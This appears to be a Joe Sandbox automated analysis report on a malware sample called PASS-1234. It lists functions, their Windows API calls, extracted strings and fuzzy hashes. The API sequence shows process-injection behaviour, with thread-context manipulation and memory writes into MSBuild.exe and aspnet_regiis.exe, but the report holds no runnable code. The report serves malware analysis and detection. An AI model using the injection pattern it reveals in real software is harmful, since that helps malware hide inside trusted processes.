NtGetContextThread.NTDLL ref: 6D38A4C5
NtAllocateVirtualMemory.NTDLL ref: 6D38A803
NtAllocateVirtualMemory.NTDLL ref: 6D38AAC0
NtWriteVirtualMemory.NTDLL ref: 6D38AB87
NtWriteVirtualMemory.NTDLL ref: 6D38AEAD
NtWriteVirtualMemory.NTDLL ref: 6D38B2D5
NtReadVirtualMemory.NTDLL ref: 6D38C731
NtWriteVirtualMemory.NTDLL ref: 6D38C891
NtWriteVirtualMemory.NTDLL ref: 6D38CDD9
NtCreateThreadEx.NTDLL ref: 6D38D608
NtSetContextThread.NTDLL ref: 6D38D881
NtResumeThread.NTDLL ref: 6D38D89F
CloseHandle.KERNEL32 ref: 6D38D95C
CloseHandle.KERNEL32 ref: 6D38D970
CreateProcessW.KERNEL32 ref: 6D38DBDA
NtGetContextThread.NTDLL ref: 6D38DC0A
NtWriteVirtualMemory.NTDLL ref: 6D38DD4A
NtWriteVirtualMemory.NTDLL ref: 6D38DDCE
NtWriteVirtualMemory.NTDLL ref: 6D38DF3E
NtCreateThreadEx.NTDLL ref: 6D38E522
NtAllocateVirtualMemory.NTDLL ref: 6D38E685
NtWriteVirtualMemory.NTDLL ref: 6D38E6EC
CloseHandle.KERNEL32 ref: 6D38E8E3
CloseHandle.KERNEL32 ref: 6D38E8F7
NtCreateThreadEx.NTDLL ref: 6D38EB19

Strings

DKW, xrefs: 6D38BCA4
_~D(, xrefs: 6D38CB7A
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6D38A2F9
o3*Z, xrefs: 6D389E8B
0})O, xrefs: 6D38C582
X!-l, xrefs: 6D38C671
^_+2, xrefs: 6D38D290
0})O, xrefs: 6D38C5DE
9[9, xrefs: 6D38B85A
D, xrefs: 6D389FE1
.@, xrefs: 6D38A1F0
o3*Z, xrefs: 6D389E34
DKW, xrefs: 6D38BC2E
i 0, xrefs: 6D38BDBC
{)&N, xrefs: 6D38AC97
}"D, xrefs: 6D387E60
@*N, xrefs: 6D38A901
@, xrefs: 6D38E67D
MZx, xrefs: 6D389A07, 6D389A23
8D-, xrefs: 6D38CAC6
}"D, xrefs: 6D38D93D
.@, xrefs: 6D38A145
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6D38A17D, 6D38DB61
kernel32.dll, xrefs: 6D3899D0
ntdll.dll, xrefs: 6D3899E4

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: Virtual$Memory$Write$Thread$Create$CloseHandle$AllocateContext$ProcessWindow$AllocConsoleReadResumeShow
String ID: .@$.@$0})O$0})O$8D-$9[9$@$@*N$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$DKW$DKW$MZx$X!-l$^_+2$_~D($i 0$kernel32.dll$ntdll.dll$o3*Z$o3*Z${)&N$}"D$}"D
API String ID: 1499114107-2409534592
Opcode ID: a3816b5ce3380652d77a693fa9c9d25f7040a2a2a1d50391ead8e86fd4d21c8c
Instruction ID: f9f6762a83cf720b12b4dab2fa900c96035e4d650fc39e2ee0c136fc10779a5c
Opcode Fuzzy Hash: a3816b5ce3380652d77a693fa9c9d25f7040a2a2a1d50391ead8e86fd4d21c8c
Instruction Fuzzy Hash: D2C3F176A14611CFCB15CE3CC9D53DA7BF6BB8A311F009299D516DB395C33A8E8A8B10

Function 6D381930 Relevance: 55.3, APIs: 24, Strings: 6, Instructions: 2760filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6D3824BB
GetModuleHandleA.KERNEL32 ref: 6D38259F
K32GetModuleInformation.KERNEL32 ref: 6D382799
GetModuleFileNameA.KERNEL32 ref: 6D382829
CreateFileA.KERNELBASE ref: 6D3828CD
CloseHandle.KERNEL32 ref: 6D38322C
MapViewOfFile.KERNELBASE ref: 6D383344
VirtualProtect.KERNELBASE ref: 6D383821
VirtualProtect.KERNELBASE ref: 6D3838DF
CloseHandle.KERNEL32 ref: 6D383E17
CreateFileA.KERNEL32 ref: 6D383F3B
CreateFileMappingA.KERNEL32 ref: 6D383FB1
MapViewOfFile.KERNEL32 ref: 6D384058
CloseHandle.KERNEL32 ref: 6D384111
GetCurrentProcess.KERNEL32 ref: 6D384126
GetModuleHandleA.KERNEL32 ref: 6D384170
K32GetModuleInformation.KERNEL32 ref: 6D3841CB
MapViewOfFile.KERNEL32 ref: 6D3842AF
CloseHandle.KERNEL32 ref: 6D384343
MapViewOfFile.KERNEL32 ref: 6D384385

Strings

KJ`, xrefs: 6D382B77
+="~, xrefs: 6D383015
dCodePage, xrefs: 6D381F7F, 6D38265F, 6D384195
@, xrefs: 6D383815
_p#, xrefs: 6D383A4A
_p#, xrefs: 6D383A9B

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: File$Handle$Module$CloseView$Create$CurrentInformationProcessProtectVirtual$MappingName
String ID: +="~$@$KJ`$dCodePage$_p#$_p#
API String ID: 4190414176-607597155
Opcode ID: 7a28f8006e5bebb5eed58cc5f61f4dda38ddadecaa99894db187cba7c66756dc
Instruction ID: 1fe2a281199b1f2e3606c4e7e9267c2214534b5d128dab76e8deb9cf4f3eb989
Opcode Fuzzy Hash: 7a28f8006e5bebb5eed58cc5f61f4dda38ddadecaa99894db187cba7c66756dc
Instruction Fuzzy Hash: 47232236B142058FDB14CE3CC9967DEBBFAAF8A310F009559D919DB392C73A89498F11

Function 6D3863E0 Relevance: 15.0, APIs: 3, Strings: 5, Instructions: 992
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 6D3869AE

Strings

NtQueryInformationProcess, xrefs: 6D38688C
w7A, xrefs: 6D3871F9
w7A, xrefs: 6D386F41
ntdll.dll, xrefs: 6D38681A, 6D3870B0
AA., xrefs: 6D386AF3

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: InformationProcessQuery
String ID: AA.$NtQueryInformationProcess$ntdll.dll$w7A$w7A
API String ID: 1778838933-1719475625
Opcode ID: 4471ebfe318c886a0b981c4e7329114e80405b8ea51664021bd0b2f7263d23bd
Instruction ID: 8e22e472f05e0d01cb4d44396226099bb14742fe8aaa3982d3ff646f1a13b5a5
Opcode Fuzzy Hash: 4471ebfe318c886a0b981c4e7329114e80405b8ea51664021bd0b2f7263d23bd
Instruction Fuzzy Hash: 1D723572A642018FCF05CEBCC6D53DEBBFABB86354F109516D512DB38AC33A99098B51

Function 6D38FE38 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D38FE7F
___scrt_uninitialize_crt.LIBCMT ref: 6D38FE99

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: a7017a494b6cdea0366035ec51b872ff165c419a75e8248ac8b974865b52c8af
Instruction ID: 3ab387c68d32d346fa80bd8c7fd72b53d37d3dc385c68522731e5f01a91805cd
Opcode Fuzzy Hash: a7017a494b6cdea0366035ec51b872ff165c419a75e8248ac8b974865b52c8af
Instruction Fuzzy Hash: 5F41C473D0C31AEFDB219F65C841B6E7B79EF86B58F018116E9546B152D7318901CBA0

Function 6D38FEE8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6D38FF25
dllmain_crt_dispatch.LIBCMT ref: 6D38FF3C
dllmain_raw.LIBCMT ref: 6D38FF84
dllmain_crt_dispatch.LIBCMT ref: 6D38FF97
dllmain_raw.LIBCMT ref: 6D38FFAA

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6a1c3971f5376140c092a2d70c39c7029f1d29ca9b1bb3d6b2bbdb5f24eac923
Instruction ID: 72c32aea81496ac1adb271f56e2103e0caf6f4a34846a5402aa8bff9b5c01863
Opcode Fuzzy Hash: 6a1c3971f5376140c092a2d70c39c7029f1d29ca9b1bb3d6b2bbdb5f24eac923
Instruction Fuzzy Hash: 29218E73D0861AAFDB229E55C841A7F3B79EF86B98B028115F9156B212C7328D418BA0

Function 6D38FD31 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D38FD7E

Part of subcall function 6D3901FB: InitializeSListHead.KERNEL32(6D3EBF88,6D38FD88,6D39F0D8,00000010,6D38FD19,?,?,?,6D38FF41,?,00000001,?,?,00000001,?,6D39F120), ref: 6D390200

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D38FDE8

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: ad6a38c53aec16485b7c3d629c28c7283b64c3c313242b365c07eaed9c3340f7
Instruction ID: 9191aa2da19ba893fb18f62324a9b3f71a8d965b00ea64f21035b01650d66d85
Opcode Fuzzy Hash: ad6a38c53aec16485b7c3d629c28c7283b64c3c313242b365c07eaed9c3340f7
Instruction Fuzzy Hash: 4B21D23254C306AADB11AFB5D406BAE77619F0276DF05801AD7C16F2C3FB226145CAA5

Function 6D394B5D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6D394BA9
GetFileType.KERNELBASE(00000000), ref: 6D394BBB

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 9e5620d0af6a8a8cfec5b3cf6e9bb231c4fcb0cc1b946aae31621a66c8dcfa04
Instruction ID: a18fbc9aa9b792d3b829bb117c5e1adb3278ebe8b5c84b102fbaa8fa6150365d
Opcode Fuzzy Hash: 9e5620d0af6a8a8cfec5b3cf6e9bb231c4fcb0cc1b946aae31621a66c8dcfa04
Instruction Fuzzy Hash: 8511B7B2608B525ADB314D3D8C857227AA8A74F230B24071AD1F59E1F1E3B1D542C758

Function 6D3953C0 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6D3953EE
_free.LIBCMT ref: 6D395414

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 067c20137160065a0596879428f2616c0703d993f3be06def05cd9fccce98165
Instruction ID: 612f14e803a20429541f32b4d771537b8556078c6f553d5ddf0dc0bea553d06f
Opcode Fuzzy Hash: 067c20137160065a0596879428f2616c0703d993f3be06def05cd9fccce98165
Instruction Fuzzy Hash: 1411B671A082116BDB309E2D9C42BBA3BB9B716739F191627EA65CF1D0F3B4C8818740

Function 6D393126 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D392D29,00000001,00000364,00000013,000000FF,?,00000001,6D393118,6D3931A9,?,?,6D3923BC), ref: 6D393167

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9f994a65643679dfd325bc30d1e3867020c09c5cb7150d0e5a389a35c13ca4de
Instruction ID: b709e4712cfe2873a539f844c558180e4525db78c4d6cc334c998b4b3d6688b0
Opcode Fuzzy Hash: 9f994a65643679dfd325bc30d1e3867020c09c5cb7150d0e5a389a35c13ca4de
Instruction Fuzzy Hash: 73F024B160812576EB123A2A8C02BAA376CAF436A0B058122E91D9F2E0FB21D500C2F4

Non-executed Functions

Function 6D38EB40 Relevance: 6.2, Strings: 4, Instructions: 1239COMMONLIBRARYCODE

Download Yara Rule

Strings

G2Wv, xrefs: 6D38FC85
G2Wv, xrefs: 6D38F7E7
`r , xrefs: 6D38F507
`r , xrefs: 6D38F4B9

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: G2Wv$G2Wv$`r $`r
API String ID: 0-4165461558
Opcode ID: 2ccde4c7a05cc948989a403257a67cd64e7e39d866e8108c26880ddabc9b5f87
Instruction ID: ae9f5e380d2da27fe09191cdfc6bfa4b16f84f94850d84f727bf1fa6d696f0ab
Opcode Fuzzy Hash: 2ccde4c7a05cc948989a403257a67cd64e7e39d866e8108c26880ddabc9b5f87
Instruction Fuzzy Hash: 23922537E542019FCF09CE7CD5953DD7BF6BB86310F10D61AD921EB396C62A89098B28

Function 6D39051A Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6D390526
IsDebuggerPresent.KERNEL32 ref: 6D3905F2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D390612
UnhandledExceptionFilter.KERNEL32(?), ref: 6D39061C

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4b254b64e58d89fc7bc17bb8424aeae760055b183ffd3230732cb58a3f021f7b
Instruction ID: a2682ce780742acdbac62f3c144ec5aad03f85d3d88ac28ff5f1a7e0d934d674
Opcode Fuzzy Hash: 4b254b64e58d89fc7bc17bb8424aeae760055b183ffd3230732cb58a3f021f7b
Instruction Fuzzy Hash: E63134B5D0521D9BDF10DFA5C98ABCDBBB8BF08304F1041AAE408AB240EB719A85CF44

Function 6D3843A0 Relevance: 5.9, Strings: 3, Instructions: 2164COMMON

Download Yara Rule

Strings

v@\X, xrefs: 6D3853FA
^WB`, xrefs: 6D385075
v@\X, xrefs: 6D3860B2

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: ^WB`$v@\X$v@\X
API String ID: 0-1414892351
Opcode ID: c1b0e8c45fd50653bbcf8df655694c12e86a66b8c22c6a145c4ef7998a777057
Instruction ID: 9de259e68af326ca9f16902189f3a0e013dca7f2ad78bfdf0a02d0e34bde0355
Opcode Fuzzy Hash: c1b0e8c45fd50653bbcf8df655694c12e86a66b8c22c6a145c4ef7998a777057
Instruction Fuzzy Hash: 0FF23536B602158FDF15CE3CC9957DEBBFABB46310F10A15AD919DB396C23A8949CB00

Function 6D387220 Relevance: 5.9, Strings: 4, Instructions: 879COMMON

Download Yara Rule

Strings

_I, xrefs: 6D387678
_I, xrefs: 6D387624
aAxg, xrefs: 6D387D60
aAxg, xrefs: 6D387B09

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: _I$_I$aAxg$aAxg
API String ID: 0-1894833198
Opcode ID: d1ff647657749abaef8ca4f66d10e21cc79cc2bc6078db7d85e36637fb49fa3a
Instruction ID: 3278041b4eec0c0129b13d5300e78d9363603512a914c1025ad4df62761a9332
Opcode Fuzzy Hash: d1ff647657749abaef8ca4f66d10e21cc79cc2bc6078db7d85e36637fb49fa3a
Instruction Fuzzy Hash: 6C6291B6F201059FCF08CEACD8817DEBBF7BB4A350F149115E825E7395C63A99098B64

Function 6D392EAA Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D392FA2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D392FAC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D392FB9

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 38d5a9aea98577e9071b9863be57d26f296a21dbf84e153901882d65a0bb757a
Instruction ID: 44887f8d750bf5856f53526fd2e4540b55775a50fd5cb089f9ec37b60efaef30
Opcode Fuzzy Hash: 38d5a9aea98577e9071b9863be57d26f296a21dbf84e153901882d65a0bb757a
Instruction Fuzzy Hash: 0531C575D0121DABCB21DF65D989B9DBBB8FF48310F5042EAE41CAB250E7709B818F44

Function 00BE97E0 Relevance: 4.5, Strings: 3, Instructions: 787COMMON

Download Yara Rule

Strings

k_XY, xrefs: 00BE9856
xyz{, xrefs: 00BEA04E
\, xrefs: 00BE99B4

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID: \$k_XY$xyz{
API String ID: 0-3857921785
Opcode ID: 59eda82679a7d5261ae6a4c959f0b0482143335ce588c1437f4cf7bf13fa235c
Instruction ID: 25bf69096c76819ab014ba66808ed75ba8fb210ea1ff819248df442a7fb69c40
Opcode Fuzzy Hash: 59eda82679a7d5261ae6a4c959f0b0482143335ce588c1437f4cf7bf13fa235c
Instruction Fuzzy Hash: 62422272A083408FD714CF29C8817ABBBE6EFC5710F198A6CE5959B391D734D909CB92

Function 6D391CA5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6D391CA4,?,00000001,?,?), ref: 6D391CC7
TerminateProcess.KERNEL32(00000000,?,6D391CA4,?,00000001,?,?), ref: 6D391CCE
ExitProcess.KERNEL32 ref: 6D391CE0

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f1ab702f04938385e75a44e354ca1eca65194662a807088ef71b463c1cb907eb
Instruction ID: e5ea62f8ebcbe1bb68bb5e415bff0641e78e398a76b142831e48d5928392e4af
Opcode Fuzzy Hash: f1ab702f04938385e75a44e354ca1eca65194662a807088ef71b463c1cb907eb
Instruction Fuzzy Hash: E4E04632804508BBCF126B55CA09E983B7DEB01245B014514FA089E620EB3AD982CB80

Function 00BB5B60 Relevance: 3.3, Strings: 2, Instructions: 802COMMON

Download Yara Rule

Strings

0, xrefs: 00BB64A3
8, xrefs: 00BB649B

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: fa2f3f3a1103f74cb571acb7a8831fbff151dfe2d9e665ee31138c2d67e08963
Instruction ID: 21003bede609a86e6d6fd7abd8da805f153545b11cb6eb136da3c12559965052
Opcode Fuzzy Hash: fa2f3f3a1103f74cb571acb7a8831fbff151dfe2d9e665ee31138c2d67e08963
Instruction Fuzzy Hash: A47236716083409FD724CF18C890BABBBE1EF98314F14896DF9998B391D7B5D948CB92

Function 6D381000 Relevance: 1.9, Strings: 1, Instructions: 685COMMON

Download Yara Rule

Strings

_o!, xrefs: 6D381482

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: _o!
API String ID: 0-296821256
Opcode ID: f528a552ca697ad65b502f91adbfc00a5691185cce83c3a51858ffa332e84e60
Instruction ID: e983307c913e830e5d48991ae13f06b65b77e6eba5eacc9966afcc50cbe1efa8
Opcode Fuzzy Hash: f528a552ca697ad65b502f91adbfc00a5691185cce83c3a51858ffa332e84e60
